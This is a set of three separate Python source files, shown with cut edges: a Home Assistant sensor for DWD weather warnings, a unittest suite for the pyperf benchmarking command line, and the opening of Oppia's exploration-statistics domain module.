import homeassistant.util.dt as dt_util
from homeassistant.components.rest.sensor import RestData
_LOGGER = logging.getLogger(__name__)
ATTRIBUTION = "Data provided by DWD"
DEFAULT_NAME = "DWD-Weather-Warnings"
CONF_REGION_NAME = "region_name"
SCAN_INTERVAL = timedelta(minutes=15)
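# Each monitored condition maps to a [sensor name suffix, unit of measurement,
# icon] list; the unit is None for both warning-level sensors.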
MONITORED_CONDITIONS = {
"current_warning_level": [
"Current Warning Level",
None,
"mdi:close-octagon-outline",
],
"advance_warning_level": [
"Advance Warning Level",
None,
"mdi:close-octagon-outline",
],
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_REGION_NAME): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(
CONF_MONITORED_CONDITIONS, default=list(MONITORED_CONDITIONS)
): vol.All(cv.ensure_list, [vol.In(MONITORED_CONDITIONS)]),
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the DWD-Weather-Warnings sensor."""
name = config.get(CONF_NAME)
region_name = config.get(CONF_REGION_NAME)
api = DwdWeatherWarningsAPI(region_name)
sensors = [
DwdWeatherWarningsSensor(api, name, condition)
for condition in config[CONF_MONITORED_CONDITIONS]
]
add_entities(sensors, True)
class DwdWeatherWarningsSensor(Entity):
"""Representation of a DWD-Weather-Warnings sensor."""
def __init__(self, api, name, variable):
"""Initialize a DWD-Weather-Warnings sensor."""
self._api = api
self._name = name
self._var_id = variable
variable_info = MONITORED_CONDITIONS[variable]
self._var_name = variable_info[0]
self._var_units = variable_info[1]
self._var_icon = variable_info[2]
@property
def name(self):
"""Return the name of the sensor."""
return f"{self._name} {self._var_name}"
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return self._var_icon
@property
def unit_of_measurement(self):
"""Return the unit the value is expressed in."""
return self._var_units
@property
def state(self):
"""Return the state of the device."""
try:
return round(self._api.data[self._var_id], 2)
except TypeError:
return self._api.data[self._var_id]
@property
def device_state_attributes(self):
"""Return the state attributes of the DWD-Weather-Warnings."""
data = {ATTR_ATTRIBUTION: ATTRIBUTION, "region_name": self._api.region_name}
if self._api.region_id is not None:
data["region_id"] = self._api.region_id
if self._api.region_state is not None:
data["region_state"] = self._api.region_state
if self._api.data["time"] is not None:
data["last_update"] = dt_util.as_local(
dt_util.utc_from_timestamp(self._api.data["time"] / 1000)
)
if self._var_id == "current_warning_level":
prefix = "current"
elif self._var_id == "advance_warning_level":
prefix = "advance"
else:
raise Exception("Unknown warning type")
data["warning_count"] = self._api.data[prefix + "_warning_count"]
i = 0
for event in self._api.data[prefix + "_warnings"]:
i = i + 1
data[f"warning_{i}_name"] = event["event"]
data[f"warning_{i}_level"] = event["level"]
data[f"warning_{i}_type"] = event["type"]
if event["headline"]:
data[f"warning_{i}_headline"] = event["headline"]
if event["description"]:
data[f"warning_{i}_description"] = event["description"]
if event["instruction"]:
data[f"warning_{i}_instruction"] = event["instruction"]
if event["start"] is not None:
data[f"warning_{i}_start"] = dt_util.as_local(
dt_util.utc_from_timestamp(event["start"] / 1000)
)
if event["end"] is not None:
data[f"warning_{i}_end"] = dt_util.as_local(
dt_util.utc_from_timestamp(event["end"] / 1000)
)
return data
@property
def available(self):
"""Could the device be accessed during the last update call."""
return self._api.available
def update(self):
"""Get the latest data from the DWD-Weather-Warnings API."""
self._api.update()
class DwdWeatherWarningsAPI:
"""Get the latest data and update the states."""
def __init__(self, region_name):
"""Initialize the data object."""
resource = "{}{}{}?{}".format(
"https://",
"www.dwd.de",
"/DWD/warnungen/warnapp_landkreise/json/warnings.json",
"jsonp=loadWarnings",
)
self._rest = RestData("GET", resource, None, None, None, True)
self.region_name = region_name
self.region_id = None
self.region_state = None
self.data = None
self.available = True
self.update()
@Throttle(SCAN_INTERVAL)
def update(self):
"""Get the latest data from the DWD-Weather-Warnings."""
try:
self._rest.update()
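# The response is JSONP; strip the callback wrapper (the leading 24
# characters and the trailing ");") to obtain the plain JSON payload.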
json_string = self._rest.data[24 : len(self._rest.data) - 2]
json_obj = json.loads(json_string)
data = {"time": json_obj["time"]}
for mykey, myvalue in {
"current": "warnings",
"advance": "vorabInformation",
}.items():
_LOGGER.debug(
"Found %d %s global DWD warnings", len(json_obj[myvalue]), mykey
)
data[f"{mykey}_warning_level"] = 0
my_warnings = []
if self.region_id is not None:
# get a specific region_id
if self.region_id in json_obj[myvalue]:
my_warnings = json_obj[myvalue][self.region_id]
else:
# loop through all items to find warnings, region_id
# and region_state for region_name
for key in json_obj[myvalue]:
my_region = json_obj[myvalue][key][0]["regionName"]
if my_region != self.region_name:
continue
my_warnings = json_obj[myvalue][key]
my_state = json_obj[myvalue][key][0]["stateShort"]
self.region_id = key
self.region_state = my_state
break
# Get max warning level
maxlevel = data[f"{mykey}_warning_level"]
for event in my_warnings:
if event["level"] >= maxlevel:
data[f"{mykey}_warning_level"] = event["level"]
data[f"{mykey}_warning_count"] = len(my_warnings)
data[f"{mykey}_warnings"] = my_warnings
_LOGGER.debug("Found %d %s local DWD warnings", len(my_warnings), mykey)
self.data = data
self.available = True
except TypeError:
_LOGGER.error("Unable to fetch data from DWD-Weather-Warnings")
self.available = False
|
|
import os
import sys
import textwrap
import unittest
import pyperf
from pyperf import tests
TESTDIR = os.path.dirname(__file__)
TELCO = os.path.join(TESTDIR, 'telco.json')
class BaseTestCase(object):
maxDiff = 100 * 80
def create_bench(self, values, metadata=None):
if metadata is None:
metadata = {'name': 'bench'}
elif 'name' not in metadata:
metadata['name'] = 'bench'
runs = []
for value in values:
run = pyperf.Run([value],
metadata=metadata,
collect_metadata=False)
runs.append(run)
return pyperf.Benchmark(runs)
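# Helper: run the pyperf command line ("python -m pyperf <args>") in a
# subprocess and return its stdout, asserting that it produced no stderr
# output and exited with status 0.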
def run_command(self, *args, **kwargs):
cmd = [sys.executable, '-m', 'pyperf']
cmd.extend(args)
proc = tests.get_output(cmd, **kwargs)
self.assertEqual(proc.stderr, '')
self.assertEqual(proc.returncode, 0)
return proc.stdout
class TestPerfCLI(BaseTestCase, unittest.TestCase):
def create_suite(self):
bench1 = self.create_bench((1.0, 1.5, 2.0),
metadata={'hostname': 'toto',
'python_version': '2.7',
'name': 'py36'})
bench2 = self.create_bench((1.5, 2.0, 2.5),
metadata={'hostname': 'toto',
'python_version': '3.4',
'name': 'py38'})
return pyperf.BenchmarkSuite([bench1, bench2])
def test_show_common_metadata(self):
suite = self.create_suite()
with tests.temporary_file() as tmp_name:
suite.dump(tmp_name)
stdout = self.run_command('show', '-q', '--metadata', tmp_name)
expected = textwrap.dedent("""
Common metadata
===============
- hostname: toto
py36
----
Metadata:
- python_version: 2.7
Mean +- std dev: 1.50 sec +- 0.50 sec
py38
----
Metadata:
- python_version: 3.4
Mean +- std dev: 2.00 sec +- 0.50 sec
""").strip()
self.assertEqual(stdout.rstrip(), expected)
def test_metadata(self):
suite = self.create_suite()
with tests.temporary_file() as tmp_name:
suite.dump(tmp_name)
stdout = self.run_command('metadata', '-q', tmp_name)
expected = textwrap.dedent("""
Common metadata
===============
- hostname: toto
py36
----
Metadata:
- python_version: 2.7
py38
----
Metadata:
- python_version: 3.4
""").strip()
self.assertEqual(stdout.rstrip(), expected)
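# Helper: dump the reference and changed benchmarks to temporary JSON files
# and run the given comparison command (e.g. 'compare_to') on them.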
def compare(self, action, ref_result, changed_result, *args):
with tests.temporary_directory() as tmpdir:
ref_name = os.path.join(tmpdir, 'ref.json')
changed_name = os.path.join(tmpdir, 'changed.json')
ref_result.dump(ref_name)
changed_result.dump(changed_name)
stdout = self.run_command(action, ref_name, changed_name, *args)
return stdout
def test_compare_to(self):
ref_result = self.create_bench((1.0, 1.5, 2.0),
metadata={'name': 'telco'})
changed_result = self.create_bench((1.5, 2.0, 2.5),
metadata={'name': 'telco'})
stdout = self.compare('compare_to', ref_result, changed_result, '-v')
expected = ('Mean +- std dev: [ref] 1.50 sec +- 0.50 sec '
'-> [changed] 2.00 sec +- 0.50 sec: 1.33x slower\n'
'Not significant!')
self.assertEqual(stdout.rstrip(),
expected)
def test_compare_to_table(self):
ref_result = self.create_bench((1.0,),
metadata={'name': 'telco'})
changed_result = self.create_bench((2.0,),
metadata={'name': 'telco'})
stdout = self.compare('compare_to', ref_result, changed_result, '--table')
expected = textwrap.dedent('''
+-----------+----------+------------------------+
| Benchmark | ref | changed |
+===========+==========+========================+
| telco | 1.00 sec | 2.00 sec: 2.00x slower |
+-----------+----------+------------------------+
''').strip()
self.assertEqual(stdout.rstrip(),
expected)
def test_compare_to_table_not_significant(self):
ref_result = self.create_bench((1.0, 1.5, 2.0),
metadata={'name': 'telco'})
changed_result = self.create_bench((1.5, 2.0, 2.5),
metadata={'name': 'telco'})
stdout = self.compare('compare_to', ref_result, changed_result, '--table')
expected = "Benchmark hidden because not significant (1): telco"
self.assertEqual(stdout.rstrip(),
expected)
def test_compare_to_not_significant(self):
ref_result = self.create_bench((1.0, 1.5, 2.0),
metadata={'name': 'name'})
changed_result = self.create_bench((1.5, 2.0, 2.5),
metadata={'name': 'name'})
stdout = self.compare('compare_to', ref_result, changed_result)
expected = 'Benchmark hidden because not significant (1): name'
self.assertEqual(stdout.rstrip(),
expected)
def test_compare_to_not_significant_verbose(self):
ref_result = self.create_bench((1.0, 1.5, 2.0),
metadata={'name': 'name'})
changed_result = self.create_bench((1.5, 2.0, 2.5),
metadata={'name': 'name'})
stdout = self.compare('compare_to', ref_result, changed_result, '-v')
expected = ('Mean +- std dev: [ref] 1.50 sec +- 0.50 sec '
'-> [changed] 2.00 sec +- 0.50 sec: 1.33x slower\n'
'Not significant!')
self.assertEqual(stdout.rstrip(),
expected)
def test_compare_to_same(self):
values = (1.0, 1.5, 2.0)
ref_result = self.create_bench(values, metadata={'name': 'name'})
changed_result = self.create_bench(values, metadata={'name': 'name'})
stdout = self.compare('compare_to', ref_result, changed_result, '-v')
expected = ('Mean +- std dev: [ref] 1.50 sec +- 0.50 sec '
'-> [changed] 1.50 sec +- 0.50 sec: no change\n'
'Not significant!')
self.assertEqual(stdout.rstrip(),
expected)
def check_command(self, expected, *args, **kwargs):
stdout = self.run_command(*args, **kwargs)
self.assertEqual(stdout, textwrap.dedent(expected).lstrip())
def test_compare_to_cli(self):
py36 = os.path.join(TESTDIR, 'mult_list_py36.json')
py37 = os.path.join(TESTDIR, 'mult_list_py37.json')
py38 = os.path.join(TESTDIR, 'mult_list_py38.json')
# 2 files
expected = """
[1]*1000: Mean +- std dev: [mult_list_py36] 2.13 us +- 0.06 us -> [mult_list_py37] 2.09 us +- 0.04 us: 1.02x faster
[1,2]*1000: Mean +- std dev: [mult_list_py36] 3.70 us +- 0.05 us -> [mult_list_py37] 5.28 us +- 0.09 us: 1.42x slower
[1,2,3]*1000: Mean +- std dev: [mult_list_py36] 4.61 us +- 0.13 us -> [mult_list_py37] 6.05 us +- 0.11 us: 1.31x slower
Geometric mean: 1.22x slower
"""
self.check_command(expected, 'compare_to', py36, py37)
# 2 files grouped by speed
expected = """
Slower (2):
- [1,2]*1000: 3.70 us +- 0.05 us -> 5.28 us +- 0.09 us: 1.42x slower
- [1,2,3]*1000: 4.61 us +- 0.13 us -> 6.05 us +- 0.11 us: 1.31x slower
Faster (1):
- [1]*1000: 2.13 us +- 0.06 us -> 2.09 us +- 0.04 us: 1.02x faster
Geometric mean: 1.22x slower
"""
self.check_command(expected, 'compare_to', "--group-by-speed", py36, py37)
# 2 files grouped by speed (with not significant)
expected = """
Faster (2):
- [1,2]*1000: 3.70 us +- 0.05 us -> 3.18 us +- 0.08 us: 1.16x faster
- [1,2,3]*1000: 4.61 us +- 0.13 us -> 4.17 us +- 0.11 us: 1.11x faster
Benchmark hidden because not significant (1): [1]*1000
Geometric mean: 1.09x faster
"""
self.check_command(expected, 'compare_to', "--group-by-speed", py36, py38)
# 3 files
expected = """
[1]*1000
========
Mean +- std dev: [mult_list_py36] 2.13 us +- 0.06 us -> [mult_list_py37] 2.09 us +- 0.04 us: 1.02x faster
Mean +- std dev: [mult_list_py36] 2.13 us +- 0.06 us -> [mult_list_py38] 2.13 us +- 0.03 us: 1.00x slower
Not significant!
[1,2]*1000
==========
Mean +- std dev: [mult_list_py36] 3.70 us +- 0.05 us -> [mult_list_py37] 5.28 us +- 0.09 us: 1.42x slower
Mean +- std dev: [mult_list_py36] 3.70 us +- 0.05 us -> [mult_list_py38] 3.18 us +- 0.08 us: 1.16x faster
[1,2,3]*1000
============
Mean +- std dev: [mult_list_py36] 4.61 us +- 0.13 us -> [mult_list_py37] 6.05 us +- 0.11 us: 1.31x slower
Mean +- std dev: [mult_list_py36] 4.61 us +- 0.13 us -> [mult_list_py38] 4.17 us +- 0.11 us: 1.11x faster
Geometric mean
==============
mult_list_py37: 1.22x slower
mult_list_py38: 1.09x faster
"""
self.check_command(expected, 'compare_to', py36, py37, py38)
# 3 files as table
expected = """
+----------------+----------------+-----------------------+-----------------------+
| Benchmark | mult_list_py36 | mult_list_py37 | mult_list_py38 |
+================+================+=======================+=======================+
| [1]*1000 | 2.13 us | 2.09 us: 1.02x faster | not significant |
+----------------+----------------+-----------------------+-----------------------+
| [1,2]*1000 | 3.70 us | 5.28 us: 1.42x slower | 3.18 us: 1.16x faster |
+----------------+----------------+-----------------------+-----------------------+
| [1,2,3]*1000 | 4.61 us | 6.05 us: 1.31x slower | 4.17 us: 1.11x faster |
+----------------+----------------+-----------------------+-----------------------+
| Geometric mean | (ref) | 1.22x slower | 1.09x faster |
+----------------+----------------+-----------------------+-----------------------+
"""
self.check_command(expected, 'compare_to', '--table', py36, py37, py38)
# 3 files as table grouped by speed
expected = """
+----------------+----------------+-----------------------+
| Benchmark | mult_list_py36 | mult_list_py37 |
+================+================+=======================+
| [1]*1000 | 2.13 us | 2.09 us: 1.02x faster |
+----------------+----------------+-----------------------+
| [1,2,3]*1000 | 4.61 us | 6.05 us: 1.31x slower |
+----------------+----------------+-----------------------+
| [1,2]*1000 | 3.70 us | 5.28 us: 1.42x slower |
+----------------+----------------+-----------------------+
| Geometric mean | (ref) | 1.22x slower |
+----------------+----------------+-----------------------+
"""
self.check_command(expected, 'compare_to', '--table', "--group-by-speed", py36, py37)
def test_compare_to_cli_min_speed(self):
py36 = os.path.join(TESTDIR, 'mult_list_py36.json')
py37 = os.path.join(TESTDIR, 'mult_list_py37.json')
py38 = os.path.join(TESTDIR, 'mult_list_py38.json')
# 2 files, min-speed=10
expected = """
[1,2]*1000: Mean +- std dev: [mult_list_py36] 3.70 us +- 0.05 us -> [mult_list_py37] 5.28 us +- 0.09 us: 1.42x slower
[1,2,3]*1000: Mean +- std dev: [mult_list_py36] 4.61 us +- 0.13 us -> [mult_list_py37] 6.05 us +- 0.11 us: 1.31x slower
Benchmark hidden because not significant (1): [1]*1000
Geometric mean: 1.22x slower
"""
self.check_command(expected, 'compare_to', "--min-speed=10", py36, py37)
# 2 files, min-speed=40
expected = """
[1,2]*1000: Mean +- std dev: [mult_list_py36] 3.70 us +- 0.05 us -> [mult_list_py37] 5.28 us +- 0.09 us: 1.42x slower
Benchmark hidden because not significant (2): [1]*1000, [1,2,3]*1000
Geometric mean: 1.22x slower
"""
self.check_command(expected, 'compare_to', "--min-speed=40", py36, py37)
# 3 files as table, min-speed=10
expected = """
+----------------+----------------+-----------------------+-----------------------+
| Benchmark | mult_list_py36 | mult_list_py37 | mult_list_py38 |
+================+================+=======================+=======================+
| [1,2]*1000 | 3.70 us | 5.28 us: 1.42x slower | 3.18 us: 1.16x faster |
+----------------+----------------+-----------------------+-----------------------+
| [1,2,3]*1000 | 4.61 us | 6.05 us: 1.31x slower | 4.17 us: 1.11x faster |
+----------------+----------------+-----------------------+-----------------------+
| Geometric mean | (ref) | 1.22x slower | 1.09x faster |
+----------------+----------------+-----------------------+-----------------------+
Benchmark hidden because not significant (1): [1]*1000
"""
self.check_command(expected, 'compare_to', '--table', "--min-speed=10", py36, py37, py38)
def test_hist(self):
# Force terminal size on Python 3 for shutil.get_terminal_size()
env = dict(os.environ)
env['COLUMNS'] = '80'
env['LINES'] = '25'
expected = ("""
22.1 ms: 1 #####
22.1 ms: 0 |
22.2 ms: 1 #####
22.2 ms: 2 ##########
22.2 ms: 3 ##############
22.3 ms: 6 #############################
22.3 ms: 4 ###################
22.3 ms: 7 ##################################
22.4 ms: 8 ######################################
22.4 ms: 14 ###################################################################
22.4 ms: 11 #####################################################
22.5 ms: 5 ########################
22.5 ms: 10 ################################################
22.6 ms: 8 ######################################
22.6 ms: 4 ###################
22.6 ms: 7 ##################################
22.7 ms: 3 ##############
22.7 ms: 4 ###################
22.7 ms: 4 ###################
22.8 ms: 7 ##################################
22.8 ms: 3 ##############
22.9 ms: 4 ###################
22.9 ms: 4 ###################
""")
self.check_command(expected, 'hist', TELCO, env=env)
def test_show(self):
expected = ("""
Mean +- std dev: 22.5 ms +- 0.2 ms
""")
self.check_command(expected, 'show', TELCO)
def test_stats(self):
expected = ("""
Total duration: 29.2 sec
Start date: 2016-10-21 03:14:19
End date: 2016-10-21 03:14:53
Raw value minimum: 177 ms
Raw value maximum: 183 ms
Number of calibration run: 1
Number of run with values: 40
Total number of run: 41
Number of warmup per run: 1
Number of value per run: 3
Loop iterations per value: 8
Total number of values: 120
Minimum: 22.1 ms
Median +- MAD: 22.5 ms +- 0.1 ms
Mean +- std dev: 22.5 ms +- 0.2 ms
Maximum: 22.9 ms
0th percentile: 22.1 ms (-2% of the mean) -- minimum
5th percentile: 22.3 ms (-1% of the mean)
25th percentile: 22.4 ms (-1% of the mean) -- Q1
50th percentile: 22.5 ms (-0% of the mean) -- median
75th percentile: 22.7 ms (+1% of the mean) -- Q3
95th percentile: 22.9 ms (+2% of the mean)
100th percentile: 22.9 ms (+2% of the mean) -- maximum
Number of outlier (out of 22.0 ms..23.0 ms): 0
""")
self.check_command(expected, 'stats', TELCO)
def test_dump_raw(self):
expected = """
Run 1: calibrate the number of loops: 8
- raw calibrate 1: 23.1 ms (loops: 1)
- raw calibrate 2: 45.0 ms (loops: 2)
- raw calibrate 3: 89.9 ms (loops: 4)
- raw calibrate 4: 179 ms (loops: 8)
Run 2: 1 warmup, 3 values, 8 loops
- raw warmup 1: 180 ms
- raw value 1: 182 ms
- raw value 2: 180 ms
- raw value 3: 181 ms
"""
stdout = self.run_command('dump', '--raw', TELCO)
self.assertIn(textwrap.dedent(expected).strip(), stdout)
def test_dump(self):
expected = """
Run 1: calibrate the number of loops: 8
- calibrate 1: 23.1 ms (loops: 1, raw: 23.1 ms)
- calibrate 2: 22.5 ms (loops: 2, raw: 45.0 ms)
- calibrate 3: 22.5 ms (loops: 4, raw: 89.9 ms)
- calibrate 4: 22.4 ms (loops: 8, raw: 179 ms)
Run 2: 1 warmup, 3 values, 8 loops
- warmup 1: 22.5 ms
- value 1: 22.8 ms
- value 2: 22.5 ms
- value 3: 22.6 ms
"""
stdout = self.run_command('dump', TELCO)
self.assertIn(textwrap.dedent(expected).strip(), stdout)
def test_dump_track_memory(self):
expected = """
Run 1: calibrate the number of loops: 2^15
- calibrate 1: 7188.0 kB (loops: 2^15)
Run 2: 0 warmups, 1 value, 2^15 loops
- value 1: 7188.0 kB
Run 3: 0 warmups, 1 value, 2^15 loops
- value 1: 7192.0 kB
Run 4: 0 warmups, 1 value, 2^15 loops
- value 1: 7208.0 kB
"""
filename = os.path.join(TESTDIR, 'track_memory.json')
stdout = self.run_command('dump', filename)
self.assertIn(textwrap.dedent(expected).strip(), stdout)
def test_dump_quiet(self):
expected = """
Run 2:
- value 1: 22.8 ms
- value 2: 22.5 ms
- value 3: 22.6 ms
Run 3:
- value 1: 22.3 ms
- value 2: 22.4 ms
- value 3: 22.3 ms
"""
stdout = self.run_command('dump', '--quiet', TELCO)
self.assertIn(textwrap.dedent(expected).strip(), stdout)
def test_dump_verbose(self):
expected = """
Run 1: calibrate the number of loops: 8
- calibrate 1: 23.1 ms (loops: 1, raw: 23.1 ms)
- calibrate 2: 22.5 ms (loops: 2, raw: 45.0 ms)
- calibrate 3: 22.5 ms (loops: 4, raw: 89.9 ms)
- calibrate 4: 22.4 ms (loops: 8, raw: 179 ms)
- Metadata:
cpu_freq: 2=3596 MHz, 3=1352 MHz
cpu_temp: coretemp:Physical id 0=67 C, coretemp:Core 0=51 C, coretemp:Core 1=67 C
date: 2016-10-21 03:14:19.670631
duration: 338 ms
load_avg_1min: 0.29
mem_max_rss: 13.4 MB
runnable_threads: 1
uptime: 2 day 2 hour 4 min
Run 2: 1 warmup, 3 values, 8 loops
- warmup 1: 22.5 ms
- value 1: 22.8 ms
- value 2: 22.5 ms
- value 3: 22.6 ms
- Metadata:
cpu_freq: 2=3596 MHz, 3=2998 MHz
cpu_temp: coretemp:Physical id 0=67 C, coretemp:Core 0=51 C, coretemp:Core 1=67 C
date: 2016-10-21 03:14:20.496710
duration: 723 ms
load_avg_1min: 0.29
mem_max_rss: 13.5 MB
runnable_threads: 1
uptime: 2 day 2 hour 4 min
"""
stdout = self.run_command('dump', '--verbose', TELCO)
self.assertIn(textwrap.dedent(expected).strip(), stdout)
def test_collect_metadata(self):
stdout = self.run_command('collect_metadata')
self.assertRegex(stdout,
r'^Metadata:\n(- [^:]+: .*\n)+$')
def test_slowest(self):
stdout = self.run_command('slowest', TELCO)
self.assertEqual(stdout.rstrip(),
'#1: telco (29.2 sec)')
def test_check_stable(self):
stdout = self.run_command('check', TELCO)
self.assertEqual(stdout.rstrip(),
'The benchmark seems to be stable')
def test_command(self):
command = [sys.executable, '-c', 'pass']
stdout = self.run_command('command', '--debug-single-value', *command)
self.assertRegex(stdout,
r'^\.\ncommand: [0-9.]+ (?:ms|sec)$')
def test_check_unstable(self):
suite = self.create_suite()
with tests.temporary_file() as tmp_name:
suite.dump(tmp_name)
stdout = self.run_command('check', tmp_name)
expected = textwrap.dedent("""
py36
----
WARNING: the benchmark result may be unstable
* the standard deviation (500 ms) is 33% of the mean (1.50 sec)
Try to rerun the benchmark with more runs, values and/or loops.
Run '{0} -m pyperf system tune' command to reduce the system jitter.
Use pyperf stats, pyperf dump and pyperf hist to analyze results.
Use --quiet option to hide these warnings.
py38
----
WARNING: the benchmark result may be unstable
* the standard deviation (500 ms) is 25% of the mean (2.00 sec)
Try to rerun the benchmark with more runs, values and/or loops.
Run '{0} -m pyperf system tune' command to reduce the system jitter.
Use pyperf stats, pyperf dump and pyperf hist to analyze results.
Use --quiet option to hide these warnings.
""").strip()
expected = expected.format(os.path.basename(sys.executable))
self.assertEqual(stdout.rstrip(), expected)
def _check_track_memory_bench(self, bench, loops):
self.assertEqual(bench.get_nrun(), 2)
for run in bench.get_runs():
self.assertEqual(run.warmups, ())
self.assertEqual(len(run.values), 1)
self.assertIsInstance(run.values[0], int)
self.assertEqual(run.get_loops(), loops)
metadata = run.get_metadata()
self.assertEqual(metadata['warmups'], 1)
self.assertEqual(metadata['values'], 3)
def _check_track_memory(self, track_option):
with tests.temporary_file() as tmp_name:
self.run_command('timeit',
track_option,
'-p2', '-w1', '-l5', '-n3',
'[1,2]*1000',
'-o', tmp_name)
bench = pyperf.Benchmark.load(tmp_name)
self._check_track_memory_bench(bench, loops=5)
def test_track_memory(self):
self._check_track_memory('--track-memory')
def test_tracemalloc(self):
try:
import tracemalloc # noqa
except ImportError:
self.skipTest('tracemalloc module not available')
self._check_track_memory('--tracemalloc')
@unittest.skipIf(sys.platform == 'win32',
'https://github.com/psf/pyperf/issues/97')
def test_command_track_memory(self):
cmd = (sys.executable, '-c', 'pass')
with tests.temporary_file() as tmp_name:
args = ('command',
'--track-memory',
'-p2', '-w1', '-l2', '-n3',
'-o', tmp_name,
'--')
args += cmd
self.run_command(*args)
bench = pyperf.Benchmark.load(tmp_name)
self._check_track_memory_bench(bench, loops=2)
class TestConvert(BaseTestCase, unittest.TestCase):
def test_stdout(self):
bench = self.create_bench((1.0, 1.5, 2.0))
with tests.temporary_file() as tmp_name:
bench.dump(tmp_name)
stdout = self.run_command('convert', tmp_name, '--stdout')
self.assertEqual(stdout,
tests.benchmark_as_json(bench))
def test_indent(self):
bench = self.create_bench((1.0, 1.5, 2.0))
with tests.temporary_file() as tmp_name:
bench.dump(tmp_name)
stdout = self.run_command('convert', tmp_name,
'--indent', '--stdout')
self.assertEqual(stdout,
tests.benchmark_as_json(bench, compact=False))
def test_convert(self):
bench = pyperf.Benchmark.load(TELCO)
with tests.temporary_directory() as tmpdir:
filename = os.path.join(tmpdir, 'test.json')
self.run_command('convert', TELCO, '-o', filename)
bench2 = pyperf.Benchmark.load(filename)
tests.compare_benchmarks(self, bench2, bench)
def test_filter_benchmarks(self):
values = (1.0, 1.5, 2.0)
benchmarks = []
for name in ("call_simple", "go", "telco"):
bench = self.create_bench(values, metadata={'name': name})
benchmarks.append(bench)
suite = pyperf.BenchmarkSuite(benchmarks)
with tests.temporary_directory() as tmpdir:
filename = os.path.join(tmpdir, 'test.json')
suite.dump(filename)
stdout = self.run_command('convert', filename,
'--include-benchmark', 'go', '--stdout')
suite2 = pyperf.BenchmarkSuite.loads(stdout)
stdout = self.run_command('convert', filename,
'--exclude-benchmark', 'go', '--stdout')
suite3 = pyperf.BenchmarkSuite.loads(stdout)
self.assertEqual(suite2.get_benchmark_names(),
['go'])
self.assertEqual(suite3.get_benchmark_names(),
['call_simple', 'telco'])
def test_remove_warmups(self):
values = [1.0, 2.0, 3.0]
raw_values = [5.0] + values
run = pyperf.Run(values, warmups=[(1, 5.0)],
metadata={'name': 'bench'})
bench = pyperf.Benchmark([run])
self.assertEqual(bench._get_nwarmup(), 1)
self.assertEqual(bench._get_raw_values(warmups=True),
raw_values)
with tests.temporary_directory() as tmpdir:
filename = os.path.join(tmpdir, 'test.json')
bench.dump(filename)
stdout = self.run_command('convert', filename,
'--remove-warmups', '--stdout')
bench2 = pyperf.Benchmark.loads(stdout)
self.assertEqual(bench2._get_nwarmup(), 0)
self.assertEqual(bench2._get_raw_values(warmups=True),
raw_values[1:])
def test_filter_runs(self):
runs = (1.0, 2.0, 3.0, 4.0, 5.0)
bench = self.create_bench(runs)
self.assertEqual(bench.get_values(), runs)
with tests.temporary_directory() as tmpdir:
filename = os.path.join(tmpdir, 'test.json')
bench.dump(filename)
stdout = self.run_command('convert', filename,
'--include-runs', '4', '--stdout')
bench2 = pyperf.Benchmark.loads(stdout)
stdout = self.run_command('convert', filename,
'--include-runs', '1-3,5', '--stdout')
bench3 = pyperf.Benchmark.loads(stdout)
stdout = self.run_command('convert', filename,
'--exclude-runs', '2,4', '--stdout')
bench4 = pyperf.Benchmark.loads(stdout)
self.assertEqual(bench2.get_values(), (4.0,))
self.assertEqual(bench3.get_values(), (1.0, 2.0, 3.0, 5.0))
self.assertEqual(bench4.get_values(), (1.0, 3.0, 5.0))
if __name__ == "__main__":
unittest.main()
|
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Domain object for statistics models."""
import numbers
import sys
from core.domain import action_registry
from core.domain import exp_domain
from core.domain import interaction_registry
from core.domain import issue_registry
from core.platform import models
import feconf
import utils
(stats_models,) = models.Registry.import_models([models.NAMES.statistics])
# These are special sentinel values attributed to answers migrated from the old
# answer storage model. Those answers could not have session IDs or time spent
# values inferred or reconstituted perfectly, so they are assigned these
# values, instead. Logic and jobs which use these values are expected to skip
# over the migrated answers to avoid tainted results. Furthermore, all migrated
# answers are easy to retrieve by reducing session value on this session ID.
# NOTE TO DEVELOPERS: All other state answer data model entities must not ever
# store this session ID unless it was created by the 2017 answer migration job
# (see #1205). Also, this string must never change.
MIGRATED_STATE_ANSWER_SESSION_ID_2017 = 'migrated_state_answer_session_id_2017'
MIGRATED_STATE_ANSWER_TIME_SPENT_IN_SEC = 0.0
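# Illustrative sketch (not part of the original module): a job that aggregates
# answers is expected to skip migrated answers, e.g. assuming it iterates over
# answer dicts that carry a 'session_id' field:
#
#     if answer['session_id'] == MIGRATED_STATE_ANSWER_SESSION_ID_2017:
#         continue  # Skip answers migrated by the 2017 migration job.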
# These values dictate the types of calculation objects stored in
# StateAnswersCalcOutput.
CALC_OUTPUT_TYPE_ANSWER_FREQUENCY_LIST = 'AnswerFrequencyList'
CALC_OUTPUT_TYPE_CATEGORIZED_ANSWER_FREQUENCY_LISTS = (
'CategorizedAnswerFrequencyLists')
class ExplorationStats(object):
"""Domain object representing analytics data for an exploration."""
def __init__(
self, exp_id, exp_version, num_starts_v1, num_starts_v2,
num_actual_starts_v1, num_actual_starts_v2, num_completions_v1,
num_completions_v2, state_stats_mapping):
"""Constructs an ExplorationStats domain object.
Args:
exp_id: str. ID of the exploration.
exp_version: int. Version of the exploration.
num_starts_v1: int. Number of learners who started the exploration.
num_starts_v2: int. As above, but for events with version 2.
num_actual_starts_v1: int. Number of learners who actually attempted
the exploration. These are the learners who have completed the
initial state of the exploration and traversed to the next
state.
num_actual_starts_v2: int. As above, but for events with version 2.
num_completions_v1: int. Number of learners who completed the
exploration.
num_completions_v2: int. As above, but for events with version 2.
state_stats_mapping: dict. A dictionary mapping the state names of
an exploration to the corresponding StateStats domain object.
"""
self.exp_id = exp_id
self.exp_version = exp_version
self.num_starts_v1 = num_starts_v1
self.num_starts_v2 = num_starts_v2
self.num_actual_starts_v1 = num_actual_starts_v1
self.num_actual_starts_v2 = num_actual_starts_v2
self.num_completions_v1 = num_completions_v1
